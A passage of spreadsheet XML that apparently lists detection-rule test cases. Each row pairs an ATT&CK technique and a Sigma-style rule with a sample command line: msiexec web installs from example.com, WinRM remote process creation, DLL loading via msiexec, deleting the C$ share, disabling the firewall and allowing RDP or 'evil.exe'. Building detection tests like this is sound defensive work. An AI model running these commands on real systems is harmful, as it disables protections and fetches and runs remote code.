      <c r="G3552" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3552" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3552" s="44" t="n"/>
      <c r="J3552" s="44" t="n"/>
      <c r="K3552" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3553" ht="15.75" customHeight="1" s="42">
      <c r="A3553" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B3553" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cl_loadassembly</t>
        </is>
      </c>
      <c r="C3553" s="44" t="inlineStr">
        <is>
          <t>Assembly Loading Via CL_LoadAssembly.ps1</t>
        </is>
      </c>
      <c r="D3553" s="44" t="inlineStr">
        <is>
          <t>c57872c7-614f-4d7f-a40d-b78c8df2d30d</t>
        </is>
      </c>
      <c r="E3553" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "$env:temp\LoadAssemblyFromPath"</t>
        </is>
      </c>
      <c r="F3553" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3553" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3553" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3553" s="44" t="n"/>
      <c r="J3553" s="44" t="n"/>
      <c r="K3553" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3554" ht="15.75" customHeight="1" s="42">
      <c r="A3554" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B3554" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs</t>
        </is>
      </c>
      <c r="C3554" s="44" t="inlineStr">
        <is>
          <t>Remote Code Execute via Winrm.vbs</t>
        </is>
      </c>
      <c r="D3554" s="44" t="inlineStr">
        <is>
          <t>9df0dd3a-1a5c-47e3-a2bc-30ed177646a0</t>
        </is>
      </c>
      <c r="E3554" s="44" t="inlineStr">
        <is>
          <t>cscript.exe winrm invoke Create "wmicimv2/Win32_Process" -r:[http://192.0.2.10](http://192.0.2.10)</t>
        </is>
      </c>
      <c r="F3554" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3554" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3554" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3554" s="44" t="n"/>
      <c r="J3554" s="44" t="n"/>
      <c r="K3554" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3555" ht="15.75" customHeight="1" s="42">
      <c r="A3555" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B3555" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs</t>
        </is>
      </c>
      <c r="C3555" s="44" t="inlineStr">
        <is>
          <t>Remote Code Execute via Winrm.vbs</t>
        </is>
      </c>
      <c r="D3555" s="44" t="inlineStr">
        <is>
          <t>9df0dd3a-1a5c-47e3-a2bc-30ed177646a0</t>
        </is>
      </c>
      <c r="E3555" s="44" t="inlineStr">
        <is>
          <t>cscript.exe winrm invoke Create wmicimv2/Win32_Process /r:[http://192.0.2.10](http://192.0.2.10)</t>
        </is>
      </c>
      <c r="F3555" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3555" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3555" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3555" s="44" t="n"/>
      <c r="J3555" s="44" t="n"/>
      <c r="K3555" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3556" ht="15.75" customHeight="1" s="42">
      <c r="A3556" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B3556" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs</t>
        </is>
      </c>
      <c r="C3556" s="44" t="inlineStr">
        <is>
          <t>Remote Code Execute via Winrm.vbs</t>
        </is>
      </c>
      <c r="D3556" s="44" t="inlineStr">
        <is>
          <t>9df0dd3a-1a5c-47e3-a2bc-30ed177646a0</t>
        </is>
      </c>
      <c r="E3556" s="44" t="inlineStr">
        <is>
          <t>cscript.exe winrm invoke Create wmicimv2/Win32_ScheduledJob -r:[http://192.0.2.10](http://192.0.2.10)</t>
        </is>
      </c>
      <c r="F3556" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3556" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3556" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3556" s="44" t="n"/>
      <c r="J3556" s="44" t="n"/>
      <c r="K3556" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3557" ht="15.75" customHeight="1" s="42">
      <c r="A3557" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B3557" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs</t>
        </is>
      </c>
      <c r="C3557" s="44" t="inlineStr">
        <is>
          <t>Remote Code Execute via Winrm.vbs</t>
        </is>
      </c>
      <c r="D3557" s="44" t="inlineStr">
        <is>
          <t>9df0dd3a-1a5c-47e3-a2bc-30ed177646a0</t>
        </is>
      </c>
      <c r="E3557" s="44" t="inlineStr">
        <is>
          <t>cscript.exe winrm.vbs invoke Create wmicimv2/Win32_Process -r:[http://192.0.2.10](http://192.0.2.10)</t>
        </is>
      </c>
      <c r="F3557" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3557" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3557" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3557" s="44" t="n"/>
      <c r="J3557" s="44" t="n"/>
      <c r="K3557" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3558" ht="15.75" customHeight="1" s="42">
      <c r="A3558" s="44" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B3558" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs</t>
        </is>
      </c>
      <c r="C3558" s="44" t="inlineStr">
        <is>
          <t>Remote Code Execute via Winrm.vbs</t>
        </is>
      </c>
      <c r="D3558" s="44" t="inlineStr">
        <is>
          <t>9df0dd3a-1a5c-47e3-a2bc-30ed177646a0</t>
        </is>
      </c>
      <c r="E3558" s="44" t="inlineStr">
        <is>
          <t>cscript.exe winrm invoke  Create wmicimv2/Win32_Process -r:[http://192.0.2.10](http://192.0.2.10)</t>
        </is>
      </c>
      <c r="F3558" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3558" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3558" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3558" s="44" t="n"/>
      <c r="J3558" s="44" t="n"/>
      <c r="K3558" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3559" ht="15.75" customHeight="1" s="42">
      <c r="A3559" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3559" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_dll</t>
        </is>
      </c>
      <c r="C3559" s="44" t="inlineStr">
        <is>
          <t>DllUnregisterServer Function Call Via Msiexec.EXE</t>
        </is>
      </c>
      <c r="D3559" s="44" t="inlineStr">
        <is>
          <t>84f52741-8834-4a8c-a413-2eb2269aa6c8</t>
        </is>
      </c>
      <c r="E3559" s="44" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe "/z" "C:\AtomicRedTeam\atomics\T1218.007\bin\MSIRunner.dll"</t>
        </is>
      </c>
      <c r="F3559" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3559" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3559" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3559" s="44" t="n"/>
      <c r="J3559" s="44" t="n"/>
      <c r="K3559" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3560" ht="15.75" customHeight="1" s="42">
      <c r="A3560" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3560" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_dll</t>
        </is>
      </c>
      <c r="C3560" s="44" t="inlineStr">
        <is>
          <t>DllUnregisterServer Function Call Via Msiexec.EXE</t>
        </is>
      </c>
      <c r="D3560" s="44" t="inlineStr">
        <is>
          <t>84f52741-8834-4a8c-a413-2eb2269aa6c8</t>
        </is>
      </c>
      <c r="E3560" s="44" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe	/z	"C:\AtomicRedTeam\atomics\T1218.007\bin\MSIRunner.dll"</t>
        </is>
      </c>
      <c r="F3560" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3560" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3560" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3560" s="44" t="n"/>
      <c r="J3560" s="44" t="n"/>
      <c r="K3560" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3561" ht="15.75" customHeight="1" s="42">
      <c r="A3561" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3561" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_execute_dll</t>
        </is>
      </c>
      <c r="C3561" s="44" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Execute Arbitrary DLL</t>
        </is>
      </c>
      <c r="D3561" s="44" t="inlineStr">
        <is>
          <t>6f4191bb-912b-48a8-9ce7-682769541e6d</t>
        </is>
      </c>
      <c r="E3561" s="44" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe "/y" "C:\AtomicRedTeam\atomics\T1218.007\bin\MSIRunner.dll"</t>
        </is>
      </c>
      <c r="F3561" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3561" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3561" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3561" s="44" t="n"/>
      <c r="J3561" s="44" t="n"/>
      <c r="K3561" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3562" ht="15.75" customHeight="1" s="42">
      <c r="A3562" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3562" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_execute_dll</t>
        </is>
      </c>
      <c r="C3562" s="44" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Execute Arbitrary DLL</t>
        </is>
      </c>
      <c r="D3562" s="44" t="inlineStr">
        <is>
          <t>6f4191bb-912b-48a8-9ce7-682769541e6d</t>
        </is>
      </c>
      <c r="E3562" s="44" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe	/y	"C:\AtomicRedTeam\atomics\T1218.007\bin\MSIRunner.dll"</t>
        </is>
      </c>
      <c r="F3562" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3562" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3562" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3562" s="44" t="n"/>
      <c r="J3562" s="44" t="n"/>
      <c r="K3562" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3563" ht="15.75" customHeight="1" s="42">
      <c r="A3563" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3563" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_web_install</t>
        </is>
      </c>
      <c r="C3563" s="44" t="inlineStr">
        <is>
          <t>MsiExec Web Install</t>
        </is>
      </c>
      <c r="D3563" s="44" t="inlineStr">
        <is>
          <t>f7b5f842-a6af-4da5-9e95-e32478f3cd2f</t>
        </is>
      </c>
      <c r="E3563" s="44" t="inlineStr">
        <is>
          <t>msiexec.exe /i http:\\example.com\test.msi</t>
        </is>
      </c>
      <c r="F3563" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3563" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3563" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3563" s="44" t="n"/>
      <c r="J3563" s="44" t="n"/>
      <c r="K3563" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3564" ht="15.75" customHeight="1" s="42">
      <c r="A3564" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3564" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_web_install</t>
        </is>
      </c>
      <c r="C3564" s="44" t="inlineStr">
        <is>
          <t>MsiExec Web Install</t>
        </is>
      </c>
      <c r="D3564" s="44" t="inlineStr">
        <is>
          <t>f7b5f842-a6af-4da5-9e95-e32478f3cd2f</t>
        </is>
      </c>
      <c r="E3564" s="44" t="inlineStr">
        <is>
          <t>msiexec.exe /i "http://example.com/test.msi"</t>
        </is>
      </c>
      <c r="F3564" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3564" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3564" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3564" s="44" t="n"/>
      <c r="J3564" s="44" t="n"/>
      <c r="K3564" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3565" ht="15.75" customHeight="1" s="42">
      <c r="A3565" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3565" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_web_install</t>
        </is>
      </c>
      <c r="C3565" s="44" t="inlineStr">
        <is>
          <t>MsiExec Web Install</t>
        </is>
      </c>
      <c r="D3565" s="44" t="inlineStr">
        <is>
          <t>f7b5f842-a6af-4da5-9e95-e32478f3cd2f</t>
        </is>
      </c>
      <c r="E3565" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\msiexec.exe /i http://example.com/test.msi</t>
        </is>
      </c>
      <c r="F3565" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3565" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3565" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3565" s="44" t="n"/>
      <c r="J3565" s="44" t="n"/>
      <c r="K3565" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3566" ht="15.75" customHeight="1" s="42">
      <c r="A3566" s="44" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3566" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_web_install</t>
        </is>
      </c>
      <c r="C3566" s="44" t="inlineStr">
        <is>
          <t>MsiExec Web Install</t>
        </is>
      </c>
      <c r="D3566" s="44" t="inlineStr">
        <is>
          <t>f7b5f842-a6af-4da5-9e95-e32478f3cd2f</t>
        </is>
      </c>
      <c r="E3566" s="44" t="inlineStr">
        <is>
          <t>msiexec.exe	/i	http://example.com/test.msi</t>
        </is>
      </c>
      <c r="F3566" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3566" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3566" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3566" s="44" t="n"/>
      <c r="J3566" s="44" t="n"/>
      <c r="K3566" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3567" ht="15.75" customHeight="1" s="42">
      <c r="A3567" s="44" t="inlineStr">
        <is>
          <t>t1070.005</t>
        </is>
      </c>
      <c r="B3567" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_share_unmount</t>
        </is>
      </c>
      <c r="C3567" s="44" t="inlineStr">
        <is>
          <t>Unmount Share Via Net.EXE</t>
        </is>
      </c>
      <c r="D3567" s="44" t="inlineStr">
        <is>
          <t>cb7c4a03-2871-43c0-9bbb-18bbdb079896</t>
        </is>
      </c>
      <c r="E3567" s="44" t="inlineStr">
        <is>
          <t>net share C$ -delete</t>
        </is>
      </c>
      <c r="F3567" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3567" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3567" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3567" s="44" t="n"/>
      <c r="J3567" s="44" t="n"/>
      <c r="K3567" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3568" ht="15.75" customHeight="1" s="42">
      <c r="A3568" s="44" t="inlineStr">
        <is>
          <t>t1070.005</t>
        </is>
      </c>
      <c r="B3568" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_share_unmount</t>
        </is>
      </c>
      <c r="C3568" s="44" t="inlineStr">
        <is>
          <t>Unmount Share Via Net.EXE</t>
        </is>
      </c>
      <c r="D3568" s="44" t="inlineStr">
        <is>
          <t>cb7c4a03-2871-43c0-9bbb-18bbdb079896</t>
        </is>
      </c>
      <c r="E3568" s="44" t="inlineStr">
        <is>
          <t>net share C$ /del</t>
        </is>
      </c>
      <c r="F3568" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3568" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3568" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3568" s="44" t="n"/>
      <c r="J3568" s="44" t="n"/>
      <c r="K3568" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3569" ht="15.75" customHeight="1" s="42">
      <c r="A3569" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B3569" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_add_rule</t>
        </is>
      </c>
      <c r="C3569" s="44" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3569" s="44" t="inlineStr">
        <is>
          <t>cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c</t>
        </is>
      </c>
      <c r="E3569" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall "firewall" "add" rule name="TestRule" dir=in action=allow protocol=TCP localport=4489</t>
        </is>
      </c>
      <c r="F3569" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3569" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3569" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3569" s="44" t="n"/>
      <c r="J3569" s="44" t="n"/>
      <c r="K3569" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3570" ht="15.75" customHeight="1" s="42">
      <c r="A3570" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B3570" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_add_rule</t>
        </is>
      </c>
      <c r="C3570" s="44" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3570" s="44" t="inlineStr">
        <is>
          <t>cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c</t>
        </is>
      </c>
      <c r="E3570" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall	firewall	add	rule name="TestRule" dir=in action=allow protocol=TCP localport=4489</t>
        </is>
      </c>
      <c r="F3570" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3570" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3570" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3570" s="44" t="n"/>
      <c r="J3570" s="44" t="n"/>
      <c r="K3570" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3571" ht="15.75" customHeight="1" s="42">
      <c r="A3571" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B3571" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_add_rule</t>
        </is>
      </c>
      <c r="C3571" s="44" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3571" s="44" t="inlineStr">
        <is>
          <t>cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c</t>
        </is>
      </c>
      <c r="E3571" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall a rule name="TestRule" dir=in action=allow protocol=TCP localport=4489</t>
        </is>
      </c>
      <c r="F3571" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3571" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3571" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3571" s="44" t="n"/>
      <c r="J3571" s="44" t="n"/>
      <c r="K3571" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3572" ht="15.75" customHeight="1" s="42">
      <c r="A3572" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B3572" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_program_in_susp_location</t>
        </is>
      </c>
      <c r="C3572" s="44" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3572" s="44" t="inlineStr">
        <is>
          <t>a35f5a72-f347-4e36-8895-9869b0d5fc6d</t>
        </is>
      </c>
      <c r="E3572" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall a rule name="Malware" dir=in action=allow program="C:\Windows\Temp\evil.exe"</t>
        </is>
      </c>
      <c r="F3572" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3572" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3572" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3572" s="44" t="n"/>
      <c r="J3572" s="44" t="n"/>
      <c r="K3572" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3573" ht="15.75" customHeight="1" s="42">
      <c r="A3573" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B3573" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_rdp</t>
        </is>
      </c>
      <c r="C3573" s="44" t="inlineStr">
        <is>
          <t>RDP Connection Allowed Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3573" s="44" t="inlineStr">
        <is>
          <t>01aeb693-138d-49d2-9403-c4f52d7d3d62</t>
        </is>
      </c>
      <c r="E3573" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall "firewall" "add" rule name="AllowRDP" dir=in action=allow protocol="tcp" localport=3389</t>
        </is>
      </c>
      <c r="F3573" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3573" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3573" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3573" s="44" t="n"/>
      <c r="J3573" s="44" t="n"/>
      <c r="K3573" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3574" ht="15.75" customHeight="1" s="42">
      <c r="A3574" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B3574" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_rdp</t>
        </is>
      </c>
      <c r="C3574" s="44" t="inlineStr">
        <is>
          <t>RDP Connection Allowed Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3574" s="44" t="inlineStr">
        <is>
          <t>01aeb693-138d-49d2-9403-c4f52d7d3d62</t>
        </is>
      </c>
      <c r="E3574" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall	add	rule name="AllowRDP" dir=in action=allow protocol=tcp	localport=3389</t>
        </is>
      </c>
      <c r="F3574" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3574" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3574" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3574" s="44" t="n"/>
      <c r="J3574" s="44" t="n"/>
      <c r="K3574" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3575" ht="15.75" customHeight="1" s="42">
      <c r="A3575" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B3575" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_rdp</t>
        </is>
      </c>
      <c r="C3575" s="44" t="inlineStr">
        <is>
          <t>RDP Connection Allowed Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3575" s="44" t="inlineStr">
        <is>
          <t>01aeb693-138d-49d2-9403-c4f52d7d3d62</t>
        </is>
      </c>
      <c r="E3575" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall a rule name="AllowRDP" dir=in action=allow protocol=tcp localport=3389</t>
        </is>
      </c>
      <c r="F3575" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3575" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3575" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3575" s="44" t="n"/>
      <c r="J3575" s="44" t="n"/>
      <c r="K3575" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3576" ht="15.75" customHeight="1" s="42">
      <c r="A3576" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B3576" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_delete_rule</t>
        </is>
      </c>
      <c r="C3576" s="44" t="inlineStr">
        <is>
          <t>Firewall Rule Deleted Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3576" s="44" t="inlineStr">
        <is>
          <t>1a5fefe6-734f-452e-a07d-fc1c35bce4b2</t>
        </is>
      </c>
      <c r="E3576" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall "firewall" "delete" rule name="TestRule"</t>
        </is>
      </c>
      <c r="F3576" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3576" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3576" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3576" s="44" t="n"/>
      <c r="J3576" s="44" t="n"/>
      <c r="K3576" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3577" ht="15.75" customHeight="1" s="42">
      <c r="A3577" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B3577" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_delete_rule</t>
        </is>
      </c>
      <c r="C3577" s="44" t="inlineStr">
        <is>
          <t>Firewall Rule Deleted Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3577" s="44" t="inlineStr">
        <is>
          <t>1a5fefe6-734f-452e-a07d-fc1c35bce4b2</t>
        </is>
      </c>
      <c r="E3577" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall	delete	rule name="TestRule"</t>
        </is>
      </c>
      <c r="F3577" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3577" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3577" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3577" s="44" t="n"/>
      <c r="J3577" s="44" t="n"/>
      <c r="K3577" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3578" ht="15.75" customHeight="1" s="42">
      <c r="A3578" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B3578" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_delete_rule</t>
        </is>
      </c>
      <c r="C3578" s="44" t="inlineStr">
        <is>
          <t>Firewall Rule Deleted Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3578" s="44" t="inlineStr">
        <is>
          <t>1a5fefe6-734f-452e-a07d-fc1c35bce4b2</t>
        </is>
      </c>
      <c r="E3578" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall del rule name="TestRule"</t>
        </is>
      </c>
      <c r="F3578" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3578" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3578" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3578" s="44" t="n"/>
      <c r="J3578" s="44" t="n"/>
      <c r="K3578" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3579" ht="15.75" customHeight="1" s="42">
      <c r="A3579" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B3579" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_disable</t>
        </is>
      </c>
      <c r="C3579" s="44" t="inlineStr">
        <is>
          <t>Firewall Disabled via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3579" s="44" t="inlineStr">
        <is>
          <t>57c4bf16-227f-4394-8ec7-1b745ee061c3</t>
        </is>
      </c>
      <c r="E3579" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall se currentprofile state off</t>
        </is>
      </c>
      <c r="F3579" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3579" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3579" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3579" s="44" t="n"/>
      <c r="J3579" s="44" t="n"/>
      <c r="K3579" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3580" ht="15.75" customHeight="1" s="42">
      <c r="A3580" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B3580" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_enable_group_rule</t>
        </is>
      </c>
      <c r="C3580" s="44" t="inlineStr">
        <is>
          <t>Netsh Allow Group Policy on Microsoft Defender Firewall</t>
        </is>
      </c>
      <c r="D3580" s="44" t="inlineStr">
        <is>
          <t>347906f3-e207-4d18-ae5b-a9403d6bcdef</t>
        </is>
      </c>
      <c r="E3580" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall se rule group="remote desktop" new enable=Yes</t>
        </is>
      </c>
      <c r="F3580" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3580" s="44" t="b">
        <v>1</v>
      </c>
